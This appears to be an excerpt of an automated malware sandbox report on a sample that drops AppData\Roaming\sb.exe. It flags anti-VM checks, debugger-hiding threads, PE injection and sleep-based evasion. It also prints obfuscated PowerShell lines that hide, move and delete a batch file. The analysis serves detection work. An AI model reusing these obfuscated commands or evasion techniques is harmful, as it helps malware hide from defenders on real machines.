        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM_3Show sources
        Source: Yara matchFile source: 00000018.00000002.2229844300.0000000002900000.00000004.00000001.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\sb.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\sb.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\sb.exeWindow / User API: threadDelayed 3762
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1296Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2972Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2980Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2304Thread sleep time: -31500s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2496Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2732Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 672Thread sleep time: -37620s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2828Thread sleep time: -340000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 1336Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2848Thread sleep time: -30000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\sb.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\sb.exeThread sleep count: Count: 3762 delay: -10
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_005C7F30 FindFirstFileW,GetLastError,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: powershell.exe, 0000000E.00000002.2106173596.0000000000126000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000
        Hides threads from debuggersShow sources
        Source: C:\Users\user\AppData\Roaming\sb.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\sb.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\sb.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\sb.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0058E501 IsDebuggerPresent,OutputDebugStringW,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0069B53C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_004262FE __EH_prolog,GetProcessHeap,HeapAlloc,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\sb.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\sb.exeMemory written: C:\Users\user\AppData\Roaming\sb.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
